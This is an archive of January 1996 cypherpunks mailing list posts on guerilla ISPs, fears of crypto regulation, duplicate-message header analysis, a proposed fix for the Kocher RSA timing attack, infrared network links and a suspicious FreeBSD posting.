of public rights of way seems to be a long-standing practice,
at least in the voice field. Voice and data are increasingly
indistinguishable, the latest move in that direction being the
practice of supporting a PBX with all-ISDN trunks.

> Punknet is a 'Guerilla ISP'.  Twenty of us share a 128k ISDN
> line, distributed via high-speed modems.  It's been running
> fine for over a year now, but Pacific Bell has evidently
> decided to get rid of us.

I have to think there is something in the way you have gone
about it that leaves you with a defect in the kinds of
recourse any of the above examples would have and would not 
hesitate to use.

Maybe you should organize the effort in some formal manner. 
Some states allow legal standing for unincorporated 
associations. Maybe a cooperative? Maybe (shudder) a 
corporation?

> We've been told that what they're doing is probably illegal,
> but it's the old problem:  Where does an 800 lb. gorilla
> sleep?

Far enough off the ground to make it interesting. 800 lbs
makes a satisfying crunch when it hits the ground. Maybe if
you poke around you can find a few dozen other groups in
similar situations, and make it far more expensive for the
telco to harrass you than to deliver service as it is supposed
to do.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOuHBkjw99YhtpnhAQFG1gH5AQ+b/TXmddMcd/GzoqACnhLGW1Bv6v3Q
wW+WnIVPWCL/qZpV6mLcACG9TSQtDJ0Sy1bk4Y9J22bL4/E7aogoNQ==
=KjPD
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 5 Jan 1996 02:44:36 +0800
To: cypherpunks@toad.com
Subject: Re: Foiling Traffic Analysis
Message-ID: <199601041734.SAA20843@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Lucky, are you just the cynic's cynic, a farther-gone 
revolutionary than you seem, or did you just have a bad month?

shamrock@netcom.com (Lucky Green) wrote (on various occasions):

- ----------

Prepare to see "felony Internet access" on the books before long.

- ----------

Nothing new here. Pornography and the other Three Horsemen will 
be use to ban the spread of 'dangerous' thoughts on the Internet. 
This was clear years ago. Let me emphasize a few facts:

o Non-GAK Encryption will be outlawed.
o 'Immoral' texts and pictures will be banned.
o The dissemination of 'dangerous ideas' will become a felony.

At best, Cypherpunks can hope to provide the infrastructure that 
will allow an underground to communicate semi-securely. We are 
unable to stop the global tidal wave of fascism. Let's not waste 
our time on bemoaning the freedoms crushed in its path. We have 
more important work to do.

- ----------

But how many of them will be willing to forward certain 
newsgroups if doing so carries a mandatory 10 year prison term? 
Hint: count the number of narcotics dealers that advertize in 
your local yellow pages.

- ----------

Some site in physical space has to host the nntpd, the ftpd, and 
the httpd. That site will be subject to search, seizure, and 
arrest and conviction of owner.

- ----------

o Outer space: not very realistic
o Offshore boats: see the fate of drug trafficers in   
  international waters after the Coast Guard is through with 
  them.
o Stable dictatorships: Not stable enough to withstand an 
  humanitarian mission by the US Army.

- ----------

Wrong. Only 0.03% of the home PCs have to be seized and the 
owners incarcerated. The remaining users will cease to carry 
controlled data on their own.

- ----------

Seems to me that the laws are becomming unified on a global 
scale. The people in power all over the world have the same 
interests. To stay in power. The 'unregulated' Internet is in 
direct confilict with this interest. Since these powers make the 
laws, they will use the laws to reduce the threat the present day 
Internet presents.

Will C2 carry certain newsgroups/info after doing so has become a 
felony? Who wants to be an 'illegal data' kingpin and face 
execution? (Kingpins are 'data trafficers' that carry more than 
1.5 Megs of 'controlled information'.)

- ----------

That is called a conspiracy. The consequence is that all machines 
involved will be confiscated and their respective owners jailed.

- ----------

Well, you can seize the machine running the OS for the crimes it 
committed. I am serious. No prosecution needed.

- ----------

Prosecution followed by conviction is what will happen to the 
owner of the computer on which the OS was running.

- ----------

Time to bring up my favorite CP invention of the last years: Wai 
Dai's Pipenet. Of course running Pipenet would be a felony in the 
future I forsee, but it sure is a great idea.

- ----------

Pretty hard. That's why the corporate officers will be jailed 
instead. Not that this would be necessary to stop the corporation 
from operating.  The authorities can just confiscating all the 
equipment and thereby put the corporation out of business. Saves 
time and trial costs. They just haul off the computers and 
declare that they are now property of the government.

- ----------

Only to have the box impounded within a few days after going 
on-line. A very costly and likely short lived hobby.

- ----------

All participants in this network are clearly guilty of 
conspiracy. Their assets will be confiscated under RICO. As Brian 
mentioned, the law enforcement agencies are creating a surplus by 
such seizures. The costs associated with more prosecutions are 
more than offset by the revenue generated. Your computer will 
make a welcome addition to their budget. 

- ----------

Inevitably, a DC net or the Token Ring approach described earlier 
will be used for illegal purposes. Once, not if, that comes to 
pass all participants will be guilty of conspiracy and their 
property subject to forfeiture. No trial needed and it will 
happen to the applause of the general public.

========================================

The answer to much of what you write off without a fight is 
fairly obvious, but not yet being mentioned in open conversation.
Without intending this to be a flame, I'd respectfully suggest 
that giving up the living room and den in the hope of a back- 
bedroom campaign against a home invader is probably not a 
workable strategy (if you'll allow a metaphor uncomfortably 
close to the subject matter).

One rule of these types of things is to carry the battle to the 
opponent's ground. Allowing the battle on your own ground is 
hard on the furniture.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOuAJEjw99YhtpnhAQFdHAIAiaIBOIVVTU1sQwPCDbRgY5Acmg+9oQiL
SwLItL4dVz4xPoo6OU3AwDbQvbENuYb2bL7EdUrg6GG4/TRFv1zuiA==
=x7j7
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 5 Jan 1996 10:43:33 +0800
To: cypherpunks@toad.com
Subject: Apologies for my absense
Message-ID: <v02120d11ad123d1f3913@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry I've been so absent from the list recently.

I've been variously flying back and forth to different conferences,
working on putting new things together for RSAREF, and finally going
on a much needed vacation (I'm feeling much better now.) Actually, after
recovering from blood loss from the hoards of mosquitos which greeted me
at the airport, I've finally gotten ready to wade through my Cpunk backlogs.

Some news:

1. Come to the RSAREF conference, and say hi at the Consensus booth. Its
rumored I'll be wearing a white shirt 2 of the 3 days and maybe a jacket,
while wearing a tie and boxers one one of the days. (The tie is a bit
unusual I have to admit.)

You all gave me a number of nifty wishlists when I stuck the option out
there before and I think life is good. I can't tell you about it now, or
at least I'm not going to because suspense is fun. However, in seriousness
stop by. We'll have at least 3 major announcements to make which will be
of moderate interest to y'all. Besides, I'm spending the next two weeks
panicking about the booth and will need some peer support once I collapse.
(We just wanted a room for an hour to get a little roundtable.)

2. Please give some comment on our RSAREF web pages. I've just started pouring
some info into them to answer questions people have about the licensing and
such. If there are questions you have that aren't answered, let me know. (If
the question is, where do I send my flame... you don't really need me to answer
do you? :)

Anyway, who else is going to be at the conference? (Also who is going to be
at MacWorld?)

Lastly, I'd like to plan a Cpunk party. I'm thinking about March 15th perhaps
in the Berkeley area. Its going to be a Sake party, in the Takara Sake
factory, so we can be really droll and mix the Cyber/Cypher punk motif. :)
That sound like a good night? Any major conferences causing a problem?

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Minter <cminter@mipos2.intel.com>
Date: Fri, 5 Jan 1996 11:00:33 +0800
To: cypherpunks@toad.com
Subject: Re: Concription [NOISE]
Message-ID: <199601050244.VAA02095@zws388.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous@freezone.remailer wrote:
> Does anyone understand what this "Concryption" really is? Reading the
> press blurbs, it could be nothing more than simply compressing the
> stream before encrypting it. A patent on that idea would be rather
> awkward.

if there is nothing more to concription, then it sounds like a bogus
patent since PGP documents and implements the technique already. 
Maybe it would make a nice trademark though.

Does anyone know if macaroni and cheese combined in one meal is 
patented?  If not, maybe I can go out and patent it. :)

-- 
______________________________________________________________________
Corey Minter | cminter@mipos2.intel.com | (408) 765-1714




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 5 Jan 1996 02:59:57 +0800
To: cypherpunks@toad.com
Subject: Re: Duplicate messages
Message-ID: <199601041745.SAA21208@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  4 Jan 96 at 7:00, Dr. Dimitri Vulis wrote (to Ed Carp):

> Please stop polluting this mailing list with test messages.
> Thank you.
> 
> (I wish I could set up procmail on this box.)

I find it to be less work to scan messages marked for deletion 
by the Cohen/Alice/Hallam/Vulis/Nuri filter for the occasional 
meaningful one than to have to scan the main body of messages 
to delete the meaningless ones.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOv240jw99YhtpnhAQHHfwIAgJU+MoL4jhk9Lv+H8U/ZpNOwaGVlC0Mr
1ij6fjrw3fnvYsd8ChoxxvWGjV30t2/ZagPHbuHezQLI/mHZy9fYwg==
=AK3i
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Fri, 5 Jan 1996 09:13:19 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: test
In-Reply-To: <XuH7gD28w165w@bwalk.dm.com>
Message-ID: <199601050049.SAA19801@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Ed, I've pointed out to you during our mini-flame war that I've been getting
> 4 copies of your every e-mail: 2 via the cpunks list, 2 directly from your
> box cc:'d to me. You _know_ that I've been getting 2 copies of cc:'s not
> passing through toad.com, that the problem is at your end, and not at toad.com,
> and you should _not_ send test posts to cypherpunks.

The problem is *not* at my end, your ignorance is showing.  If it were, 
then everyone would be getting 2 copies of everything I send, and that's 
simply not true.  Some people are getting two copies, but some are only 
getting one copy.

> None of the following:
>  * your test posts
>  * your lack of understanding of anonymous remailers
>  * your inability to configure sendmail
> have any cryptographic relevance (other than to discredit your technical
> knowledge, which you have done quite thoroughly :)

My understanding of anonymous remailers has nothing to do with this - 
I've not posted or emailed through one, so I don't know where this 
comment is coming from.  As for configuring sendmail, I would not be 
afraid to estimate that I've probably configured sendmail for more 
systems than you've ever seen in your entire life, so if my technical 
qualifications are in doubt, they are in doubt only in your own mind.  My 
employer (and all of my employers for the last 16 years) have paid 
relatively well for my technical shills, and continue to do so.

> Please stop polluting this mailing list with test messages. Thank you.

I would suggest that it is *your* lack of technical expertise that is at 
the root of your not neing able to set up procmail.  Besides, if you want 
to filter my posts or email, filter will do the job, and it's so fast and 
easy to set up that I taught an ex- to do it in about 10 minutes - and 
she has trouble finding the on/off switch to her computer.

Please stop polluting the list with your flames.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOx1jSS9AwzY9LDxAQFpMAP/WZv/JrA6WIagfL12Jxni+HQH/4lsOMFc
gK51Jeb1HTE7+gPf03yPSFqkW6fp3jZzIN6Mr3PuaB0cOk92irRU9RHd3L4rtyPE
1IJ/KKaoluMO0dOq4duFvpJO1ximKQD7TPyMKDlBZSLbZ5nP6yXogOrH7Aep5fJ+
DkXnkhWVKiw=
=crDC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Fri, 5 Jan 1996 08:26:17 +0800
To: dreschs@austnsc.tandem.com
Subject: Re:  FreeBSD user <fb@sponsor.octet.com>
Message-ID: <9601050000.AA09148@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I consider it to be an attack.

Certainly seems like it to me when it bungs up my poor eudora dial-up
connection and I can't get mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 5 Jan 1996 11:39:40 +0800
To: cypherpunks@toad.com
Subject: Net Censorship Story on All Things Considered
Message-ID: <199601050311.TAA27573@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This evening I heard a story on Internet censorship on All Things
Considered.  They said that Compuserve was close to deploying technology to
keep only Germans out of the 200 news groups.  (Compuserve and the Germans
still disagree about where the list came from.)

They also interviewed Denise Curaso (sp?) who provided some reality about
the how censorship could quickly move to political views that certain
countries don't like and how a Compuserve user could easly bypass
Compuserve censorship.

The story ended with the comment that in the past, many net people have
said that since the Internet was designed to survive atomic war, the net
would just bypass around censorship, but between the Germans and Exon,
fewer of them are saying it now.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 13:28:46 +0800
To: Robbie Gates <gates_r@maths.su.oz.au>
Subject: Representations of Pi, etc.
Message-ID: <m0tY2h0-00097wC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 AM 1/5/96 +1100, you wrote:
>> The decimal representation of any irrational number (e.g. pi, e)
>> contains the decimal representation of every natural number
>> somewhere. (Proof by diagonalization.)

>What you say here isn't quite true.


Right.  

But BTW, isn't it interesting, that news item from a few weeks ago, on an
algorithm for determining individual bits in Pi, regardless of whether
you've calculated all the previous ones.  Only problem is, it only works in
hexadecimal (and, obviously, binary, etc, not decimal.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 10:09:56 +0800
To: ecarp@netcom.com
Subject: Double Messages from Ed Carp
Message-ID: <ad11c32f0f0210047c61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 AM 1/5/96, Ed Carp [khijol SysAdmin] wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>> Ed, I've pointed out to you during our mini-flame war that I've been getting
>> 4 copies of your every e-mail: 2 via the cpunks list, 2 directly from your
>> box cc:'d to me. You _know_ that I've been getting 2 copies of cc:'s not
>> passing through toad.com, that the problem is at your end, and not at
>>toad.com,
>> and you should _not_ send test posts to cypherpunks.
>
>The problem is *not* at my end, your ignorance is showing.  If it were,
>then everyone would be getting 2 copies of everything I send, and that's
>simply not true.  Some people are getting two copies, but some are only
>getting one copy.

I have also been getting two copies of most or all of your messages, at
least for the past few weeks (since you became active on the list again, I
think).

I have not been complaining, just deleting the extra copies.

In looking at the detailed headers of a pair of such duplicates I see that
there may have been some kind of "fork" (not a technical term, just a
description) where the two messages (called Blue and Red) differ as
follows:

Blue Message:

Received: from dal1820.computek.net by toad.com id AA01149; Thu, 4 Jan 96
16:49:35 PST
Received: (from erc@localhost) by dal1820.computek.net (8.6.10/8.6.10) id
SAA19801; Thu, 4 Jan 1996 18:49:29 -0600

Red Message:

Received: from dal1820.computek.net by toad.com id AA01148; Thu, 4 Jan 96
16:49:36 PST
Received: (from erc@localhost) by dal1820.computek.net (8.6.10/8.6.10) id
SAA19801; Thu, 4 Jan 1996 18:49:29 -0600

Only a one-second difference, but the difference grows in later headers.
The point is that there were already two slightly difference versions of
the message before toad.com was reached.

Other subtle differences exist, too. For example:

Blue Message:

X-UIDL: 820809984.020

Red Message:

X-UIDL: 820809984.018

I don't even know what X-UIDL is, but this is a notable difference between
the two versions.

I suggest you carefully examine the full headers and go from there. It
appears that toad.com is only sending two messages because it _received_
two messages.

--Tim May



We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 5 Jan 1996 08:55:13 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Kocher timing attack in RISKS
In-Reply-To: <v0153050dad10efd26ebd@[206.86.1.35]>
Message-ID: <199601050027.TAA03963@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[via Steven Weller]
> Reproduced here from RISKS digest:
> 
> ------------------------------
> 
> Date: Tue, 26 Dec 1995 17:23:09 -0100
> From: Saso Tomazic <saso.tomazic@fer.uni-lj.si>
> Subject: Re: Timing cryptanalysis of RSA, DH, DSS (Kocher, RISKS-17.53)
[...]
> 2.) It is not so difficult to rewrite algorithms to be resistant to timing
> attacks, i.e., to have execution time independent of secret key.  For
> example, the algorithm to compute R = y^x mod n given in the Kocher paper
> can be simply rewritten as:
> 
> Let R = 1.
> Let A = 1.
> Let z = y.
> For i=0 upto (bits_in_x-1):
>    If (bit i of x) is 1 then
>          Let A = (R*z) mod n
>    Else
>          Let B = (R*z) mod n
> Let y = y^2 mod n.
> Let R = A.
> End.
> 
> to be resistant to timing attacks.

This appears to be a version of something Hal and I and others initially
suggested that doesn't really defeat the timing attack. In particular, the
variable size of R in iteration k affects the time taken to compute either
A or B in iteration k+1.

Futplex <futplex@pseudonym.com>
*** Welcome to Cypherpunks -- Now Go Home ***

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOxwKCnaAKQPVHDZAQEapwf+IcCBI6ksBOftZ/ASB7azlmNXAT2Gzvlw
/1ifFUPNY3nF1G2KWOVUi7tfke0W9xzPDM9G5oG4lJ+SoRcalnO9sVcL5UaxQT0d
9mpskePCgyhQhYfYlVcRL7DglcY+7y451TSkHihRCyyUxxV5xfy9PDBPNDlXBwnR
y9JSsEwuB9Amv2BrX/fwI5m6nuGNvRytSNrqFeLw1X8XTXknwx89KIlIlyOTPGYa
ntS90pJ+bbiYnr3caOLrwAzSBsDnHduFA+0IKa66dOZNahF+1OiCC/roOE4lAxfl
vQ8hOH6Y2EMdJ5If3IchnuunC10xBE+PQhRepBoSQCuTxqfbItaDGw==
=izhc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 5 Jan 1996 09:09:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Trying to init security channel
Message-ID: <199601050040.TAA06237@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
> Date: Thu, 4 Jan 96 13:11:36 IST
> From: geoff klein <geoff@commtouch.co.il>
> To: cypherpunks@toad.com
> Subject: Trying to init security channel
> X-Potpinitrequest: AwAAAAAAAADhi+swAQAAAPqPQh4AACoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARjMwMzBGRjIyMTFENTBEMABnZW9mZkBjb21tdG91Y2guY28uaWwAY3lwaGVycHVua3NAdG9hZC5jb20A

Another satisfied "Power One Time Pad" user, it would appear....

> 
> 	This message was sent by Pronto Secure Mail.
> 	Without Pronto you can not establish a secure channel.
>
> 	Please send a reply manually.

Futplex <futplex@pseudonym.com>
*** Welcome to Cypherpunks -- Now Go Home ***

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOxzMinaAKQPVHDZAQGcIwf+KYlU8PiutVTduMG2Jxt7KDsEhDvjjiDi
p+kBKw0y2Tj+Z/LGoCTSu2egMxFf9L9mWg8ulNCXPu92Bg1PWNPFJpTeXYcQfHnz
fQfQlbnixwo1gU1DW0AVpeq5iIdBwOOqh2TEa5m7LQXiCU3RDS0Q0+muDzvncykC
UkF+uzPvxrZW88LFnxSmYez3o/Xj0V39gvKANkZvqOotm90g5bYb6TY8qCUFfSUh
hNPPA1irtYc96a73WXRYciW4T1H8cfsmmlwMxbCbILer6MPH+2CZMD1DP5eIu0cd
4vvN6n3pPgBs7YAp4RANf6HKHZpJwB/MG+TOt2ngolsPt5JFvrUKuQ==
=wXVD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MMac102754@aol.com
Date: Fri, 5 Jan 1996 09:19:05 +0800
To: cypherpunks@toad.com
Subject: re: FreeBSD user <fb@sponsor.octet.com>
Message-ID: <960104195738_106753282@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I've gotten thee posting from fb@sponsor.octet.com that are greek to me. Or
is it code?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 5 Jan 1996 09:27:43 +0800
To: cypherpunks@toad.com
Subject: Re: \"Concryption\"
In-Reply-To: <199601041435.PAA16631@utopia.hacktic.nl>
Message-ID: <199601050105.UAA29900@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone understand what this "Concryption" really is? Reading the
press blurbs, it could be nothing more than simply compressing the
stream before encrypting it. A patent on that idea would be rather
awkward.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 5 Jan 1996 09:52:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CryptoPessimism (Was: Foiling Traffic Analysis)
In-Reply-To: <199601041734.SAA20843@utopia.hacktic.nl>
Message-ID: <199601050134.UAA06813@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anonymous claiming to be "We Jurgar Din" [perhaps truthfully, I didn't check
the PGP sig against previous ones] writes:
> Lucky, are you just the cynic's cynic, a farther-gone 
> revolutionary than you seem, or did you just have a bad month?

Lucky usually defines the pessimistic extreme of cypherpunk views of the
future (with Duncan at the other end). I tend to agree with Lucky's side, but
then I _am_ an inveterate cynic. But to be annoyingly cute about it,
inveterate != invertebrate. I don't envision a rosy scenario, but I'm not
giving up.

[various quoted Lucky lines elided]
> The answer to much of what you write off without a fight is 
> fairly obvious, but not yet being mentioned in open conversation.

Well, let's talk about it openly! I'm not terribly interested in answers of 
the form "God moves in mysterious ways" or "If you knew what I knew, you'd
support the government's proposal to do this", although most of the world
seems to find such answers enthralling.  

> Without intending this to be a flame, I'd respectfully suggest 
> that giving up the living room and den in the hope of a back- 
> bedroom campaign against a home invader is probably not a 
> workable strategy (if you'll allow a metaphor uncomfortably 
> close to the subject matter).

- From where I sit, Lucky seems to have been quite active on the front lines,
in spite (or perhaps because) of his rhetoric. 

Futplex <futplex@pseudonym.com>
*** Welcome to Cypherpunks -- Now Go Home ***

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOyAGSnaAKQPVHDZAQEU4wf+IlcCtj9mofE4bDVfcQXoGDk3qjT8JhQ+
yHrPgtEl2zrnzD8d9pX7X8M03brBlWHkr68PkOwh+V0XRDvNISs3KOt4vzK41+jt
Z5BW7oIGaFBU1lVV8d9KAxynFrv/mMegyAjZ49vLnm/+wyyZGme08QkoHZeyTbxK
F/i6+pbtSu3cFWVwNH+urf+ySeCV61wEDBkN4vmxiFCkcJYZ90jDOC8jJKBhXkzX
wg5DNAcpN7CKm2PJiU/H7Eu6Edjnj234aVlYQy2sPAN8JuA8whdxzPuNC/5ZPdu7
PuAAkE2eR+iN1KxYXA2Qv8lKgsiznyR6cBvx1sdkaG3Pd/obokoKAQ==
=EMdm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 5 Jan 1996 13:13:32 +0800
To: ecarp@netcom.com
Subject: Re: test
In-Reply-To: <199601050049.SAA19801@dal1820.computek.net>
Message-ID: <199601050446.UAA24423@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The problem is *not* at my end, your ignorance is showing.  If it were, 
> then everyone would be getting 2 copies of everything I send, and that's 
> simply not true.  Some people are getting two copies, but some are only 
> getting one copy.
	This mail arrived twice.

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel C. Cotey" <dccotey@alf.uccs.edu>
Date: Fri, 5 Jan 1996 12:22:43 +0800
To: cypherpunks@toad.com
Subject: Re: FreeBSD
Message-ID: <Pine.OSF.3.91.960104205824.21381A-100000@alf>
MIME-Version: 1.0
Content-Type: text/plain



	I was wondering if anyone else with pine observed wierd behaviour 
when reading that message. My pine exported the file, started a message, 
then fired up a shell, at which point I killed it before anything else 
happened.

---                                                                         ---
 Daniel Cotey	   					 dccotey@serf.uccs.edu
			




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 5 Jan 1996 14:53:53 +0800
To: cypherpunks@toad.com
Subject: Re: Double Messages from Ed Carp
Message-ID: <2.2.32.19960105050514.0096c610@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:19 PM 1/4/96 -0800, Tim May wrote:

>In looking at the detailed headers of a pair of such duplicates I see that
>there may have been some kind of "fork" (not a technical term, just a
>description) where the two messages (called Blue and Red) differ as
>follows:
>
[Weirdness deleted]

I am seeing the duplicates with another user as well.

Received: (from lastxit@localhost) by arrakis.alphachannel.com
(8.6.12/8.6.12) id SAA10251; Wed, 3 Jan 1996 18:52:35 -0600
To: cypherpunks@toad.com
From: "Marc Martinez"   <lastxit@alphachannel.com>
In-Reply-To: master@internexus.net's message of 3 Jan 1996 13:44:30 -0500
Subject: Re: 2047 bit keys in PGP

Received: (from lastxit@localhost) by arrakis.alphachannel.com
(8.6.12/8.6.12) id SAA10237; Wed, 3 Jan 1996 18:50:10 -0600
Date: Wed, 3 Jan 1996 18:50:10 -0600
To: cypherpunks@toad.com
From: "Marc Martinez"   <lastxit@alphachannel.com>
In-Reply-To: master@internexus.net's message of 3 Jan 1996 13:44:30 -0500

This might be an isolated problem with this user or someplace between here
and there is duping mail messages...

I thought there were more but it turned out to be a bunch of messages I was
cc:ed on and it got caught in the filter.



Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 15:03:49 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tY4b4-00092hC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 1/4/96 -0800, you wrote:
>At 11:43 1/4/96 -0600, Jason Rentz wrote:
>>Previous exchanges deleted...
>>>
>>>With a tightly focused beam (light is easy, I don't know about lower
>>>frequencies), you can prevent interception except by very obvious physical
>>>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>>>avoid the need to encrypt the link (and all the paranoia about key
>>>management, advances in factoring etc. that that implies.)
>>>
>>>Bill
>>
>>The problem with this comes when you start creating links between much
>>taller buildings like in San Fran.  Any give building over 30 stories might
>>sway a foot or so at any given time.  Combine that with the other building
>>and you might get a few feet of movement. (movement not including during an
>>earthquake)  :)
>
>(1) No single communication technology is appropriate for every problem.
>
>(2) A technical fix could include having the receiver send steering orders
>to the transmitter.  This solution would, of course, be a long way from the
>low tech scavenged lens and 1/2 meter cardboard mailing tube technology I
>was thinking of.

I think you guys (further up the reply chain) are missing the point.  While
IR does have stealth advantages in, say, wartime, for routine network usage
everyone can be assumed to know where everyone else is, and where all the
optical links are, etc.  There's no point trying to use link-location
secrecy.  And presumably, encryption will provide all the
message-secrecy/anti-spoofing functions required.  Simply ASSUME that the
beams can be intercepted (although probably not intentionally cut).  That's
why we're "cypherpunks," right?!?

Secondly, IR beams can be plenty narrow enough to avoid inter-link
interference, but at the same time wide enough to avoid beam-steering
problems. Note: I'm assuming link distances of under, say 300 meters here.

Previously, a point was made about the effects of fog cutting links:  Due to
scattering, one of the reasons automobile fog lamps are 550 nanometer
yellow/orange is to minimize the scattering that shorter wavelengths (400 nm
blue, 450 nm green) are more prone to.  I would imagine that near IR at,
say, 890 nm would be dramatically less sensitive to such scattering.  1400
nm might be even better.  Rain might be a different story.  But then again,
